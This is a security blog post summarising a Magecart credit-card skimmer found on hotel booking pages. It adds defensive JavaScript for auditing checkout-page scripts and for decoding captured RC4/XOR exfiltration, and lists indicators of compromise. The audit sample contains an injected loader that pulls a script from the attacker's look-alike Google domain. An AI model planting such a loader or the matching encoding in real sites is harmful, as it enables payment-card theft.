Magecart Skimming Attack Targets Mobile Users of Hotel Chain Booking Websites

TrendMicro analyzed a recent series of attacks by the Magecart threat group in which its credit card skimming malware targeted the booking sites of hotel chains. Toward the beginning of September, they discovered JavaScript code injected into the payment pages of two hotel websites, each belonging to a different chain.

The injected JavaScript loads a remote script and appears to have been present in the websites' source code since August 9th. Both hotel chains' websites were developed by "Roomleader," a hotel website development company based in Spain. The attackers placed their code in Roomleader's "viewedHotels" module, a script that saves information about the hotels a visitor has viewed in the browser's cookies.
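Because the malicious code hid inside a legitimate first-party module and pulled in a remote script from a look-alike domain, a useful defensive check is to audit every script a checkout page loads (static `src` attributes and URLs embedded in inline scripts) against an allowlist and against published indicators. The following is an added example written for this page, not code from TrendMicro, Roomleader or the affected sites. The allowlist hosts, the page origin and the sample checkout HTML are constructed for illustration; the IoC host comes from the report below.

```javascript
// Added example (not TrendMicro's or Roomleader's code): audit the script
// sources of a checkout page against an allowlist so that an injected remote
// loader stands out. The allowlist and the sample HTML are constructed.

// Assumed allowlist of hosts that are legitimately allowed to serve scripts.
const ALLOWED_SCRIPT_HOSTS = new Set([
  "www.example-hotel.com",       // constructed first-party host
  "www.googletagmanager.com",    // the real Google Tag Manager host
]);

// Indicator published in the write-up this page summarises.
const KNOWN_IOC_HOSTS = new Set(["googletrackmanager.com"]);

// <script ...>...</script> tags: group 1 = attributes, group 2 = inline body.
const SCRIPT_TAG_RE = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
const SRC_ATTR_RE = /\bsrc\s*=\s*["']([^"']+)["']/i;
// Absolute URLs inside inline code (candidate remote loaders or exfil endpoints).
const URL_IN_CODE_RE = /https?:\/\/[^\s"'`)]+/gi;

function hostOf(url, pageOrigin) {
  try {
    return new URL(url, pageOrigin).hostname.toLowerCase();
  } catch {
    return null; // not a resolvable URL
  }
}

function classify(host, url, where, findings) {
  if (!host) return;
  if (KNOWN_IOC_HOSTS.has(host)) {
    findings.push({ severity: "critical", host, url, where, reason: "matches published IoC" });
  } else if (!ALLOWED_SCRIPT_HOSTS.has(host)) {
    // A "google"-looking host that is not on the allowlist deserves a closer look.
    const reason = /google/.test(host) ? "Google look-alike host not in allowlist"
                                       : "host not in allowlist";
    findings.push({ severity: "warn", host, url, where, reason });
  }
}

// Returns one finding per script source or embedded URL that is not allowlisted.
function auditScripts(html, pageOrigin) {
  const findings = [];
  for (const m of html.matchAll(SCRIPT_TAG_RE)) {
    const attrs = m[1];
    const body = m[2];
    const srcMatch = attrs.match(SRC_ATTR_RE);
    if (srcMatch) {
      classify(hostOf(srcMatch[1], pageOrigin), srcMatch[1], "script-src", findings);
    } else {
      for (const u of body.matchAll(URL_IN_CODE_RE)) {
        classify(hostOf(u[0], pageOrigin), u[0], "inline-url", findings);
      }
    }
  }
  return findings;
}

// Constructed checkout page: two legitimate scripts and a stand-in for an
// injected loader of the kind the report describes.
const SAMPLE_CHECKOUT_HTML = `
<script src="https://www.example-hotel.com/js/viewedHotels.js"></script>
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-PLACEHOLDER"></script>
<script>
  var s = document.createElement("script");
  s.src = "https://googletrackmanager.com/gtm.js";
  document.head.appendChild(s);
</script>
`;

const SAMPLE_PAGE_ORIGIN = "https://www.example-hotel.com/booking/payment";

// Usage: run the audit and print anything that is not allowlisted.
for (const f of auditScripts(SAMPLE_CHECKOUT_HTML, SAMPLE_PAGE_ORIGIN)) {
  console.log(`[${f.severity}] ${f.where} ${f.url} (${f.reason})`);
}
```

Running this over the constructed page reports only the inline loader pointing at `googletrackmanager.com` as critical; the two allowlisted scripts produce no findings. In practice the same check is worth running on a schedule against the live payment page, since the report notes the injection went unnoticed for about a month.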

The skimmer itself is designed to steal credit card information, names, telephone numbers, and hotel room preferences from the payment forms on the website. The stolen data is encrypted using RC4 with a hardcoded key, "F8C5Pe4Q," and then XOR-encrypted. The result is exfiltrated in an HTTP POST request to a TLS-protected site whose domain masquerades as a Google tracking URL.
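When responding to a skim like this, the immediate question is what was actually taken, which means decoding the captured POST bodies. The following is an added example written for this page, not the skimmer's code or TrendMicro's: an analyst-side decoder for the layering the report describes, RC4 with the hardcoded key "F8C5Pe4Q" followed by an XOR pass. The write-up does not give the XOR key or the record format, so the XOR key is a parameter with an assumed sample value, the field layout is a constructed `key=value&...` record, and the sample capture is produced here rather than taken from real traffic.

```javascript
// Added example (not the skimmer's code): undo "RC4 with hardcoded key, then
// XOR" on a captured exfiltration body so an analyst can scope what was stolen.
// The RC4 key is the one named in the report; the XOR key and record format
// are assumptions because the write-up does not state them.

const RC4_KEY = "F8C5Pe4Q"; // hardcoded key named in the report

const enc = (s) => new TextEncoder().encode(s);
const toHex = (b) => Array.from(b, (x) => x.toString(16).padStart(2, "0")).join("");

// Textbook RC4. Encryption and decryption are the same operation.
function rc4(keyBytes, data) {
  // Key-scheduling algorithm (KSA)
  const S = new Uint8Array(256);
  for (let i = 0; i < 256; i++) S[i] = i;
  for (let i = 0, j = 0; i < 256; i++) {
    j = (j + S[i] + keyBytes[i % keyBytes.length]) & 0xff;
    [S[i], S[j]] = [S[j], S[i]];
  }
  // Pseudo-random generation (PRGA), XORed with the data
  const out = new Uint8Array(data.length);
  for (let k = 0, i = 0, j = 0; k < data.length; k++) {
    i = (i + 1) & 0xff;
    j = (j + S[i]) & 0xff;
    [S[i], S[j]] = [S[j], S[i]];
    out[k] = data[k] ^ S[(S[i] + S[j]) & 0xff];
  }
  return out;
}

// Repeating-key XOR; also self-inverse.
function xorWithKey(data, keyBytes) {
  const out = new Uint8Array(data.length);
  for (let k = 0; k < data.length; k++) out[k] = data[k] ^ keyBytes[k % keyBytes.length];
  return out;
}

// Builds a sample capture in the order the report describes (RC4, then XOR).
// Used only to construct test data and to check the decoder round-trips.
function obfuscate(plaintext, xorKey) {
  return xorWithKey(rc4(enc(RC4_KEY), enc(plaintext)), enc(xorKey));
}

// Analyst side: strip the XOR layer first, then RC4, and return the text.
// If the capture carries a transport encoding on top (the report does not say),
// decode that layer before calling this.
function recoverPayload(capturedBytes, xorKey) {
  const plain = rc4(enc(RC4_KEY), xorWithKey(capturedBytes, enc(xorKey)));
  return new TextDecoder().decode(plain);
}

// Assumed record format: URL-encoded form fields, so the recovered text can be
// split into the categories the report lists (card data, name, phone, room).
function parseFields(text) {
  return Object.fromEntries(new URLSearchParams(text));
}

// Constructed sample: an assumed XOR key and a made-up record with a test card number.
const ASSUMED_XOR_KEY = "placeholder-xor-key";
const SAMPLE_RECORD = "name=J.+Doe&phone=%2B44+1234+567890&cc=4111111111111111&room=non-smoking";
const SAMPLE_CAPTURE = obfuscate(SAMPLE_RECORD, ASSUMED_XOR_KEY);

// Usage: decode the capture and list which field names were exfiltrated.
const recovered = parseFields(recoverPayload(SAMPLE_CAPTURE, ASSUMED_XOR_KEY));
console.log("fields exfiltrated:", Object.keys(recovered).join(", "));
```

The RC4 routine can be checked against the standard published vector (key "Key", plaintext "Plaintext" gives `bbf316e8d940af0ad3`) before trusting any decode; a decoder that silently produces garbage is the main pitfall here, so verify the primitive first and then the layer order.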

Review of googletrackmanager.com on VirusTotal

Indicators of Compromise

  • googletrackmanager.com
  • ac58602d149305bd2331d555c15e6292bd5d09c34ade9e5eebb81e9ef1e7b312

Jason Davies

UK based technology professional, with an interest in computer security and telecoms.
